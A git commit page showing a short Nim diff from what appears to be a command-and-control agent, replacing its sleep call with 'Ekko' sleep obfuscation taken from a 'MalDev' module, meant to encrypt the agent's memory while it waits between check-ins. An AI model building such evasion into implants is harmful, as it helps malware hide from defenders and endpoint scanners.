Implemented Ekki according to MalDev module with both Native API and WinAPI; fixing race condition for both implementations.

This commit is contained in:
Jakob Friedl
2025-08-27 11:37:07 +02:00
parent 00866b30cd
commit d3e0d5e6de
2 changed files with 146 additions and 144 deletions

View File

@@ -35,11 +35,7 @@ proc main() =
while true:
# TODO: Replace with actual sleep obfuscation that encrypts agent memory
sleepMask(ctx.sleep * 1000)
# sleep(ctx.sleep * 1000)
sleepEkko(ctx.sleep * 1000)
let date: string = now().format("dd-MM-yyyy HH:mm:ss")
echo fmt"[{date}] Checking in."